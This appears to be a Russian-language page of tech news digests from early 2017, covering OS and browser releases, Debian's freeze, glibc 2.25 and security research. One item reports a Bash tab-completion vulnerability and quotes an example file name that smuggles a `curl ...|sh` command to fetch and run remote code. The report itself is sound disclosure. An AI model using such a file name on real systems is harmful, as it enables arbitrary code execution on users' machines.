Компания Google опубликовала выпуск операционной системы Chrome OS 56, основанной на ядре Linux, системном менеджере upstart, сборочном инструментарии ebuild/portage, открытых компонентах и web-браузере Chrome 56. Пользовательское окружение Chrome OS ограничивается web-браузером, а вместо стандартных программ задействованы web-приложения, тем не менее, Chrome OS включает в себя полноценный многооконный интерфейс, рабочий стол и панель задач. Сборка Chrome OS 56 доступна для всех актуальных моделей Chromebook, за исключением ASUS Chromebook Flip C100PA, Google Chromebook Pixel (2015) и Acer Chromebook R11. Энтузиастами сформированы неофициальные сборки для обычных компьютеров с процессорами x86, x86_64 и ARM. Исходные тексты распространяются под свободной лицензией Apache 2.0. Основные изменения … Читать далее Выпуск операционной системы Chrome OS 56

Компания Google представила Android Wear 2.0, редакцию платформы Android для носимых устройств, таких как умные часы. Платформа предоставляет механизмы для обмена и репликации данных между карманными и носимыми устройствами, систему управления голосом, средства для синхронизации уведомлений, возможности для обмена сообщениями и функции для занятия фитнесом. В новой версии значительно переработан интерфейс, в котором учтены пожелания пользователей и разработчиков. Ключевым новшеством Android Wear 2.0 являются настраиваемые оболочки-циферблаты с поддержкой размещения виджетов. Задействована концепция Material Design, полностью переработаны система уведомлений и меню запуска приложений. Добавлена виртуальная клавиатура, реализована поддержка распознавания рукописного ввода, расширены средства голосового управления, интегрирован голосовой помощник («Ok Google») и … Читать далее Выпуск платформы для носимых устройств Android Wear 2.0

Разработчики из команды Google Brain, занимающейся исследованиями в области искусственного интеллекта, нейронных сетей и машинного обучения, опубликовали свои наработки в области восстановления пикселизированных изображений, детализация которых была утеряна в результате масштабирования. Предложенная система позволяет с достаточно высокой точностью реконструировать возможное изображение даже когда имеются сведения всего о нескольких десятках пикселей. Например, на приведённом выше изображении показан результат воссоздания изображения, уменьшенного до 8×8 пикселей. Во втором столбце размещён предложенный системой вариант, а в третьем столбце эталонное изображение, из которого был создан исходный вариант 8×8. Метод основан на комбинировании двух нейронных сетей. Первая сеть решает задачу сопоставления восстанавливаемого изображения 8×8 с эталонной … Читать далее Google представил технику реконструкции пикселизированных изображений

Представлен выпуск проприетарного web-браузера Vivaldi 1.7, разрабатываемого на базе движка Chromium и продолжающего развитие идей классического браузера Opera, предоставляя широкий спектр возможностей, включая удобную систему группировки вкладок, боковую панель, конфигуратор с большим числом настроек, режим блокировки изображений и нежелательного контента, систему ведения заметок, режим горизонтального отображения вкладок. Интерфейс браузера написан на языке JavaScript с использованием библиотеки React, платформы Node.js, Browserify и различных готовых NPM-модулей. Сборки Vivaldi подготовлены для Linux, Windows и macOS. Для прошлых выпусков проект распространяет под открытой лицензией исходные тексты изменений к Chromium. Реализация интерфейса Vivaldi написана на JavaScript, доступна в исходных текстах, но под проприетарной лицензией. Основные … Читать далее Выпуск web-браузера Vivaldi 1.7

Группа, в которую вошли исследователи из ряда известных университетов, а также представители Mozilla, Cloudflare и Google, провела анализ распространения методов локального перехвата HTTPS-трафика и влияния такого перехвата на сетевую безопасность. Результаты превзошли ожидания исследователей, оказалось, что 4-11% HTTPS-трафика перехватывается и анализируется сторонним ПО на стороне клиента (антивирусное ПО, межсетевые экраны), при этом в большинстве случаев подобный перехват приводит к уменьшению уровня защиты соединения. Под локальным перехватом подразумеваются случаи анализа HTTPS-трафика с использованием программного обеспечения, установленного на системе пользователя (например, антивирусное ПО), или применением корпоративных шлюзов инспектирования трафика, работающих в виде прокси. Подобные системы перехватывают обращение клиента, затем от своего лица … Читать далее Исследование негативного влияния на безопасность локального перехвата HTTPS-трафика

В командном интерпретаторе Bash выявлена уязвимость (CVE-2017-5932), которая может быть использована для выполнения своего кода при выполнении операций автодополнения ввода клавишей табуляция. Проблема затрагивает ветку Bash 4.4. Исправление пока доступно только в виде патча. Проблема вызвана ошибкой в коде экранирования спецсимволов и связана с неверной обработкой наличия разных типов кавычек. Для эксплуатации достаточно создать файл со специально оформленным именем. При попытке выполнения операции автодополнения для данного файла будут выполнены определённые злоумышленником инструкции командного интерпретаора. Например, для эксплуатации достаточно создать файл с именем: длинная_строка «`curl ссылка_скрипт|sh` и добиться его обработки в строке ввода при нажатии табуляции. Читать далее Уязвимость в реализации автодополнения ввода в Bash

Разработчики из команды Google Brain, занимающейся исследованиями в области искусственного интеллекта, нейронных сетей и машинного обучения, опубликовали свои наработки в области восстановления пикселизированных изображений, детализация которых была утеряна в результате масштабирования. Предложенная система позволяет с достаточно высокой точностью воссоздавать возможное изображение даже когда имеются сведения всего о нескольких десятках пикселей. Например, на приведённом выше изображении показан результат восстановления изображения, уменьшенного до 8×8 пикселей. Во втором столбце размещён предложенный системой вариант, а в третьем столбце эталонное изображение, из которого был создан исходный вариант 8×8. Метод основан на комбинировании двух нейронных сетей. Первая сеть решает задачу сопоставления восстанавливаемого изображения 8×8 с эталонной … Читать далее Google представил технику воссоздания пикселизированных изображений

Доступен выпуск проприетарного браузера Opera 43, основанного на кодовой базе Chromium. Сборки сформированы для платформ Linux, macOS и Windows. Основные новшества: Реализован режим упреждающей загрузки страницы, который во время набора в адресной строке предсказывает наиболее вероятный адрес, учитывая статистику прошлых операций, и начинает загрузку в фоне ещё до того как пользователь закончит ввод. Если прогноз был верным пользователь мгновенно получит запрошенную страницу. При этом браузер учитывает наиболее типичные для пользователя ошибки ввода и начинает загружать правильный сайт до того как пользователь исправит опечатку. Предварительная загрузка также действует не только при вводе в адресной строке, но и при указании на страницах … Читать далее Выпуск web-браузера Opera 43

Компания Canoniсal опубликовала обновление прошивки OTA-15 (over-the-air) для смартфонов и планшетов на базе платформы Ubuntu Touch. Обновление автоматически будет доставлено пользователям смартфонов Meizu MX4/PRO 5, Nexus 4, Nexus 7 и Bq Aquaris E5/E4.5/M10, укомплектованных прошивкой на базе Ubuntu. С момента прошлого выпуска список поддерживаемых устройств не изменился. Выпуск позиционируется как обновление с устранением ошибок и проблем с безопасностью. Web-движок Oxide (предоставляет QtQuick WebView на базе ChromiumOxide) обновлён до версии 1.19.7. Во встроенном web-браузере решены проблемы с загрузкой некоторых страниц и переходом в спящий режим во время воспроизведения видео и звука. На устройствах BQ E5 решены проблемы с инвертированием передней камеры. … Читать далее Обновление прошивки Ubuntu Touch OTA-15

Компания CodeWeavers выпустила релиз пакета Crossover 16.1, основанного на коде Wine 2.0 и предназначенного для выполнения программ и игр, написанных для платформы Windows. CodeWeavers входит в число ключевых участников проекта Wine, спонсирует его разработку и возвращает в проект все новшества, реализованные для своих коммерческих продуктов. Исходные тексты открытых компонентов CrossOver 16.1 можно загрузить на данной странице. Из изменений в новом выпуске отмечается реализация поддержки пакета управления финансами Quicken 2017, устранение проблем, мешающих завершению процесса активации Microsoft Office 2010, и устранение ошибки, препятствующей нормальному накоплению и отображению статистики на экране с настройками. Читать далее Релиз CrossOver 16.1 для Linux и macOS

Проект grsecurity представил первый выпуск набора патчей с реализацией механизма защиты RAP (Reuse Attack Protector) для ядра Linux, позволяющего блокировать работу эксплоитов, основанных на технике заимствования кусков кода. Набор патчей включает всю запланированную функциональность и опубликован под лицензией GPLv2 в публичной тестовой ветке grsecurity для ядра Linux 4.9 (стабильные ветки grsecurity распространяются платно). Техника заимствования кусков кода используется для эксплуатации переполнений буфера в условиях, когда в страницах памяти стека и буфера установлен запрет на исполнение кода. Для организации выполнения кода атакующего в таких условиях логика выполнения shell-кода формируется с использованием методов возвратно-ориентированного программирования (ROP) — атакующий не пытается разместить свой … Читать далее Проект grsecurity опубликовал реализацию механизма защиты RAP для ядра Linux

Компания Intel объявила об успешной сертификации в Khronos Group реализации графических API OpenGL 4.5, OpenGL ES 3.2 и Vulkan 1.0 в своих открытых драйверах для Linux. После проверки соответствия представленных открытых реализаций на предмет соответствия требованиям стандартов Linux-драйверы Intel были добавлены в список продуктов, официально совместимых с OpenGL 4.5, OpenGL ES 3.2 и Vulkan 1.0. Тестирование проведено с использованием Mesa 13 и DRM-компонентов (Direct Rendering Manager) ядер Linux 4.8 и 4.9. Читать далее Компания Intel сертифицировала в Khronos Group поддержку OpenGL 4.5 в Linux-драйверах

Организация CNCF (Cloud Native Computing Foundation) выкупила права на исходные тексты СУБД RethinkDB и передала проект под покровительство организации Linux Foundation. Перед передачей код был переведён с копилефт лицензии AGPLv3 на пермиссивную лицензию Apache 2.0. Передача осуществлена в рамках предпринятой бывшими разработчиками RethinkDB инициативы по передаче сообществу управления над проектом. Напомним, что компания RethinkDB, развивающая одноимённую СУБД, в октябре объявила о прекращении своей деятельности, после чего судьба проекта оставалась неопределённой. В развитие RethinkDB было инвестировано более 12 миллионов долларов и семь лет разработки, но компания не смогла наладить устойчивый бизнес и вынуждена была закрыться. При этом решения на базе СУБД … Читать далее Проект RethinkDB выкуплен для передачи сообществу

Разработчики проекта Debian сообщили о переводе пакетной базы Debian 9.0 «Stretch» на стадию заморозки, при которой процесс переноса пакетов из unstable в testing остановлен и начался этап интенсивного тестирования и исправления блокирующих релиз проблем. В особых случаях пакеты из unstable могут быть перенесены вручную, но для этого требуется получение одобрения от команды, ответственной за подготовку релиза. В настоящее время насчитывается 275 критических ошибок, блокирующих релиз (в момент заморозки Debian 8 таких ошибок было около 350, Debian 7 — 650). Финальный релиз Debian 9.0 ожидается в конце весны или летом. Читать далее Debian 9.0 "Stretch" перешёл на стадию заморозки перед релизом

Доступен релиз распределённой системы управления версиями Mercurial 4.1. Код Mercurial написан на языке Python (требующие высокой производительности части оформлены в виде модулей на Си) и распространяется под лицензией GPLv2+. Среди проектов, использующих Mercurial, можно выделить следующие: Mozilla, OpenOffice.org, OpenSolaris, NetBeans, OpenJDK, Nginx, Xine и W3C. Основные изменения: Представлен новый расширяемый API для подключения движков сжатия данных, позволяющий создавать расширения с поддержкой новых форматов сжатия; В основной состав включен новый движок сжатия zstd, который собирается и используется по умолчанию во многих командах при работе поверх HTTP, если клиент и сервер поддерживают данный движок. Использование zstd позволяет на 60% снизить нагрузку на … Читать далее Выпуск распределённой системы управления версиями Mercurial 4.1

Компания Canonical опубликовала новый выпуск Snapd 2.22, инструментария для управлениями самодостаточными пакетами в формате snap, а также Snapcraft 2.26, утилит для формирования пакетов Snap. Новые версии включены в состав предварительных сборок Ubuntu Core («snap refresh —candidate core») и в ближайшее время будет добавлена в штатные репозитории Ubuntu 16.04, 16.10 и 14.04. Основные улучшения: Обеспечен автоматический прозрачный переход пользователей с «ubuntu-core» на новый snap-пакет «core»; В desktop-файлах обеспечена поддержка ярлыков «X-Ayatana-Desktop-Shortcuts»; Улучшена обработка возобнавления загрузки после возникновения ошибок при работе в сети; Возможность отключения sshd из настроек пакета «core»; В snap.yaml добавлена новая директива «reload-command»; Добавлены новые интерфейсы: unity8-download-manager, evolution, account-control, … Читать далее Обновление инструментов Snapd 2.22 и Snapcraft 2.26 для самодостаточных пакетов Snap

После шести месяцев разработки состоялся релиз системной библиотеки GNU C Library (glibc) 2.25, которая полностью следует требованиям стандартов ISO C11 и POSIX.1-2008. В состав нового выпуска включены исправления от 51 разработчика. Из добавленных в Glibc 2.25 улучшений можно отметить: Обеспечена возможность сборки большей части glibc в режиме защиты стека от переполнения. Сборка с опцией «—enable-stack- protector=strong» переведена в разряд рекомендованных; В состав включены функции getentropy и getrandom, а также связанный с ними заголовочный файл sys/random.h. Getentropy и getrandom предложены проектом OpenBSD и предоставляют возможность получения значений от системного генератора псевдослучайных чисел через обращение к системному вызову, что обеспечивает надёжную защиту … Читать далее Релиз системной библиотеки Glibc 2.25

После года разработки представлен релиз открытого медиацентра Kodi 17.0, ранее развивавшийся под именем XBMC. Готовые установочные пакеты доступны для macOS (x86, PPC), FreeBSD, Linux (ARM, PPC, x86 и x86-64), Raspberry Pi, Android (ARM, x86), Windows, Apple TV и iOS. Для Ubuntu сформирован PPA-репозиторий. Код проекта распространяется под лицензией GPLv2+. Основные новшества: Значительно модифицирован штатный графический интерфейс. По умолчанию задействована новая тема оформления Estuary, специально созданная для оптимальной работы на телевизионных экранах с управлением через пульт дистанционного управления; Для устройств с сенсорными экранами подготовлена тема оформления Estouchy; Задействован новый web-интерфейс Chorus2, предоставляющий возможности по изменению настроек, организации потоковой трансляции и навигации … Читать далее Состоялся релиз открытого медиацентра Kodi 17.0

Опубликовано обновление проекта Pyston 0.6.1, в рамках которого компанией Dropbox развивалась высокопроизводительная реализация языка Python, созданная с использованием наработок проекта LLVM и использующая JIT-компиляцию для достижения высокой производительности. Код Pyston написан на языке C++ и распространяется под лицензией Apache. Кроме исправления ошибок и устранения несовместимостей в новой версии в представлены значительные оптимизации производительности. При проведении штатных тестов Pyston 0.6.1 работает в среднем на 95% быстрее, чем CPython, в более реалистичных тестах на основе реальных web-приложений Pyston обгоняет CPython на 48%, а на серверах Dropbox — на 10%. К сожалению дальнейшее развитие проекта будет зависеть от интереса к нему независимого сообщества … Читать далее Dropbox прекращает разработку Pyston. Опубликован финальный выпуск 0.6.1

Вышел очередной релиз языка разбора произвольных бинарных файлов Kaitai Struct 0.6, приуроченный к конференции FOSDEM 2017. Язык позволяет создавать спецификации произвольных бинарные форматы файлов / пакетов / протоколов, после чего можно: Визуализировать данные в этом формате в виде интерактивного дерева объектов, наблюдая каким байтам в дампе соответствуют какие значения: Получить наглядную диаграмму формата с помощью GraphViz Скомпилировать спецификацию формата в готовую библиотеку парсинга формата на языках C++, C#, Java, JavaScript, Perl, PHP, Python, Ruby Среди основных нововведений версии 0.6 можно выделить: Поддержка невыравненного (unaligned) побитового чтения (удобно поддерживать битовые поля, можно читать потоки битов и т.д.) Мощная поддержка метаинформации в … Читать далее Релиз системы разбора бинарных файлов Kaitai Struct 0.6

Представлен релиз многоплатформенного web-браузера QupZilla 2.1.0, построенного с использованием библиотеки Qt и модуля QtWebEngine, основанного на браузерном движке Blink и элементах Chromium. Основной целью проекта QupZilla является создание полнофункционального браузера, поддерживающего лучшие возможности Firefox, Opera и Chrome, но потребляющего при этом значительно меньше ресурсов. Первостепенное внимание уделяется экономии потребления памяти, обеспечению высокого быстродействия и поддержанию отзывчивости интерфейса. Исходные тексты QupZilla распространяются под лицензией GPLv3. Бинарные сборки доступны для большинства дистрибутивов Linux (в том числе в формате AppImage), а также для Windows, OS/2 и Haiku OS. Среди изменений в новом выпуске: Возобновлена утерянная после перехода на QtWebEngine поддержка проверки правописания в … Читать далее Выпуск web-браузера QupZilla 2.1